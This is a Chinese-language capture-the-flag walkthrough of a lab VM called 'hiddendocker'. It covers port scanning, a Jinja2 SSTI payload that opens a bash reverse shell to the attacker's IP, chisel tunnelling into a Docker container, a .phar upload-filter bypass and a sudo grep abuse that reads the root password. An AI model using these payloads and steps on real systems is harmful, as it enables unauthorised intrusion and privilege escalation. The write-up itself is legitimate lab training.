信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.160  08:00:27:0d:a3:12       (Unknown)
192.168.60.254  00:50:56:e0:e6:12       (Unknown)

11 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.078 seconds (123.20 hosts/sec). 4 responded
❯ export ip=192.168.60.160
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.160:22
Open 192.168.60.160:5000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 18:56 CST
Initiating ARP Ping Scan at 18:56
Scanning 192.168.60.160 [1 port]
Completed ARP Ping Scan at 18:56, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:56
Completed Parallel DNS resolution of 1 host. at 18:56, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:56
Scanning 192.168.60.160 [2 ports]
Discovered open port 22/tcp on 192.168.60.160
Discovered open port 5000/tcp on 192.168.60.160
Completed SYN Stealth Scan at 18:56, 0.08s elapsed (2 total ports)
Nmap scan report for 192.168.60.160
Host is up, received arp-response (0.00064s latency).
Scanned at 2025-01-17 18:56:41 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
5000/tcp open  upnp    syn-ack ttl 64
MAC Address: 08:00:27:0D:A3:12 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

SSTI注入

并没有常规开放80端口，反而开放了5000端口

发现存在SSTI注入

用户提权

尝试利用一下，反弹Shell

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('bash -c \'bash -i >& /dev/tcp/192.168.60.100/1234 0>&1\'').read() }}

❯ pwncat-cs -lp 4444
[19:08:09] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[19:08:15] received connection from 192.168.60.160:49136                                                                                    bind.py:84
[19:08:15] 0.0.0.0:4444: normalizing shell path                                                                                         manager.py:957
           192.168.60.160:49136: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) pepinodemar@hiddendocker:/home/pepinodemar$ ls
Desktop  user.txt
(remote) pepinodemar@hiddendocker:/home/pepinodemar$ cat user.txt
324983I5BH34IK53486GH8G

啊⁉️这么快吗？轻而易举拿到user了

这跟靶机名字docker有什么关系吗？

我看了一下ip，发现存在docker容器

(remote) pepinodemar@hiddendocker:/home/pepinodemar/Desktop$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:0d:a3:12 brd ff:ff:ff:ff:ff:ff
    inet 192.168.60.160/24 brd 192.168.60.255 scope global dynamic enp0s3
       valid_lft 1453sec preferred_lft 1453sec
    inet6 fe80::a00:27ff:fe0d:a312/64 scope link
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:9f:04:9e:e3 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:9fff:fe04:9ee3/64 scope link
       valid_lft forever preferred_lft forever
5: veth382bdf9@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
    link/ether 1e:97:a1:df:c8:0b brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::1c97:a1ff:fedf:c80b/64 scope link
       valid_lft forever preferred_lft forever
(remote) pepinodemar@hiddendocker:/home/pepinodemar/Desktop$ ping 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.432 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.045 ms
^C
--- 172.17.0.2 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.045/0.238/0.432/0.193 ms

发现另一个用户debian而且和当前用户的users组相同

(remote) pepinodemar@hiddendocker:/tmp$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
debian:x:1000:1000:debian,,,:/home/debian:/bin/bash
pepinodemar:x:1001:1001:pepinodemar,,,:/home/pepinodemar:/bin/bash

uid=1000(debian) gid=1000(debian) grupos=1000(debian),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)
uid=1001(pepinodemar) gid=1001(pepinodemar) grupos=1001(pepinodemar),100(users)

尝试切换用户，需要密码遂放弃

端口转发

利用Chisel端口转发一下

❯ ./chisel server --reverse -p 1234
2025/01/17 19:34:06 server: Reverse tunnelling enabled
2025/01/17 19:34:06 server: Fingerprint tkC/WwgVEbJoMAqQ99fvKnSnl4RHgL0xlTt0BZNZycU=
2025/01/17 19:34:06 server: Listening on http://0.0.0.0:1234
2025/01/17 19:34:29 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
-------------------分隔-----------------
#靶机上连接
(remote) pepinodemar@hiddendocker:/tmp$ ./chisel client 192.168.60.100:1234 R:socks
2025/01/17 12:34:30 client: Connecting to ws://192.168.60.100:1234
2025/01/17 12:34:30 client: Connected (Latency 775.117µs)

可以看chisel的官方文档

你会发现，这时本地开放了1080端口

❯ ss -lnutp
Netid  State   Recv-Q  Send-Q   Local Address:Port     Peer Address:Port  Process
udp    UNCONN  0       0            127.0.0.1:323           0.0.0.0:*     
udp    UNCONN  0       0                [::1]:323              [::]:*

tcp    LISTEN  0       511            0.0.0.0:80            0.0.0.0:*     
tcp    LISTEN  0       4096         127.0.0.1:1080          0.0.0.0:*      users:(("chisel",pid=1942699,fd=7))
tcp    LISTEN  0       4096                 *:1234                *:*      users:(("chisel",pid=1942699,fd=5))
tcp    LISTEN  0       511               [::]:80               [::]:*

编辑一下proxychians，利用1080端口打开firefox

❯ sudo vim /etc/proxychains4.conf
socks5	127.0.0.1 1080
❯ proxychains firefox
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17

访问一下docker容器

发现是个dockerlabs

我发现gobuster好像并不能走代理

但是wfuzz可以，扫到两个页面，machine是有内容，访问一下

❯ proxychains wfuzz -c -u "http://172.17.0.2/FUZZ.php" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 31
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://172.17.0.2/FUZZ.php
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000015:   200        141 L    312 W      8116 Ch     "index"
000000361:   200        0 L      0 W        0 Ch        "upload"
000009849:   200        53 L     104 W      1361 Ch     "machine"

发现可以上传文件，但只允许上传zip文件

尝试上传反弹shell，你可以改成phar就能通过校验

Root提权

监听一下端口

/opt目录下有个提示

❯ pwncat-cs -lp 4444
[20:30:15] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[20:30:19] received connection from 192.168.60.160:46434                                                                                    bind.py:84
[20:30:20] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
           192.168.60.160:46434: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@415560e9ff49:/$ cd /opt/
(remote) www-data@415560e9ff49:/opt$ ls
nota.txt
(remote) www-data@415560e9ff49:/opt$ cat nota.txt
Protege la clave de root, se encuentra en su directorio /root/clave.txt, menos mal que nadie tiene permisos para acceder a ella.
保护root密码，它位于/root/clave.txt目录中，幸好没有人有权限访问它。

然而发现www-data有sudo权限

利用grep读取文件

(remote) www-data@415560e9ff49:/opt$ sudo -l
Matching Defaults entries for www-data on 415560e9ff49:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User www-data may run the following commands on 415560e9ff49:
    (root) NOPASSWD: /usr/bin/cut
    (root) NOPASSWD: /usr/bin/grep
(remote) www-data@415560e9ff49:/opt$ sudo grep '' /root/clave.txt
dockerlabsmolamogollon123

拿到密码了

回到宿主机，切换到root账户

(remote) pepinodemar@hiddendocker:/tmp$ su root
Contraseña:
root@hiddendocker:/tmp# cd ~
root@hiddendocker:~# ls
root.txt
root@hiddendocker:~# cat root.txt
34259435B34IKHB5KL3JB5